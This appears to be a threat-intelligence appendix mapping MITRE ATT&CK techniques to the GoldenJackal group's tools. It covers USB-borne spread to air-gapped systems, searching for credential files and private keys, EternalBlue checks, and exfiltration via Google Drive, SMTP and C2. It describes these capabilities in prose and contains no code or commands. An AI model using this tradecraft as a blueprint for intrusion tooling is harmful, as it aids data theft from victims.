T1036.008  Masquerading: Masquerade File Type  JackalWorm uses a folder icon to disguise itself as a non-executable file. 
T1112  Modify Registry  GoldenDealer modifies the registry so that hidden files and directories are not shown in Windows Explorer. 
T1027.013  Obfuscated Files or Information: Encrypted/Encoded File  GoldenJackal uses various encryption algorithms in its toolset, such as XOR, Fernet, and AES, to encrypt configuration files and files to be exfiltrated. 
Credential Access  T1552.001  Unsecured Credentials: Credentials In Files  GoldenUsbGo looks for files whose filenames are usually associated with credentials. 
T1552.004  Unsecured Credentials: Private Keys  GoldenUsbGo looks for files that may contain private keys, such as those whose filenames contain id_rsa. 
Discovery  T1087.001  Account Discovery: Local Account  GoldenDealer collects information about all user accounts on a compromised system. 
T1083  File and Directory Discovery  GoldenHowl has a module to generate a listing of files and directories on a compromised system. GoldenUsbCopy and GoldenUsbGo generate a listing of files and directories on a USB drive. 
T1046  Network Service Discovery  GoldenHowl can scan a remote system for open ports, and check whether the target is vulnerable to the EternalBlue exploit. 
T1120  Peripheral Device Discovery  GoldenDealer and GoldenUsbCopy monitor the insertion of removable drives. GoldenUsbGo and GoldenAce check a set of drive letters to detect attached removable drives. 
T1057  Process Discovery  GoldenDealer obtains information about running processes on a compromised system. 
T1018  Remote System Discovery  GoldenHowl can scan an IP range to detect other systems. 
T1518  Software Discovery  GoldenDealer obtains information about installed programs on a compromised system. 
T1082  System Information Discovery  GoldenDealer obtains various information about the operating system and user accounts on a compromised system. 
T1016.001  System Network Configuration Discovery: Internet Connection Discovery  GoldenDealer can determine whether a computer is connected to the internet. 
T1135  Network Share Discovery  GoldenAce checks a list of drive letters that can include network shares. 
Lateral Movement  T1210  Exploitation of Remote Services  GoldenHowl can check for a Windows SMB remote code execution vulnerability that can then be exploited for lateral movement. 
T1091  Replication Through Removable Media  GoldenDealer copies executables to and from USB drives to target air-gapped systems. GoldenAce propagates malicious executables via removable drives. 
Collection  T1560.002  Archive Collected Data: Archive via Library  GoldenRobo and GoldenUsbCopy archive files to be exfiltrated with the ZIP library. 
T1119  Automated Collection  GoldenUsbCopy and GoldenUsbGo automatically stage files for later exfiltration once a new removable drive is detected. 
T1005  Data from Local System  Most tools in GoldenJackal's toolset collect information and files from the local system. 
T1025  Data from Removable Media  GoldenUsbCopy and GoldenUsbGo collect interesting files from removable media. GoldenAce can retrieve staged files from a specific directory on a removable drive. GoldenDealer can retrieve information about compromised systems from a specific directory on a removable drive. 
T1074.001  Data Staged: Local Data Staging  Most tools in GoldenJackal's toolset stage files locally for other components to process or exfiltrate. 
T1114.001  Email Collection: Local Email Collection  GoldenBlacklist and GoldenPyBlacklist process email files that were collected by an unknown component in GoldenJackal's toolset. 
Command and Control  T1071.001  Application Layer Protocol: Web Protocols  GoldenDealer and GoldenHowl use HTTPS for communication. 
T1092  Communication Through Removable Media  GoldenDealer uses removable media to pass executables to air-gapped systems, and information from those systems back to connected systems. 
T1132.001  Data Encoding: Standard Encoding  Executable files sent from the C&C server to GoldenDealer are base64 encoded. 
T1572  Protocol Tunneling  GoldenHowl can forward messages through an SSH tunnel. 
T1090.001  Proxy: Internal Proxy  GoldenHowl can act as a proxy, forwarding packets. 
Exfiltration  T1041  Exfiltration Over C2 Channel  GoldenHowl exfiltrates files via the same channel used for its C&C. 
T1052.001  Exfiltration Over Physical Medium: Exfiltration over USB  GoldenJackal's toolset provides capabilities to copy files from air-gapped systems and move them to connected systems via USB drives, for exfiltration. 
T1567.002  Exfiltration Over Web Service: Exfiltration to Cloud Storage  GoldenDrive exfiltrates files to an attacker-controlled Google Drive account. 
T1048.002  Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol  GoldenMailer exfiltrates files via SMTP, using STARTTLS on port 587. 
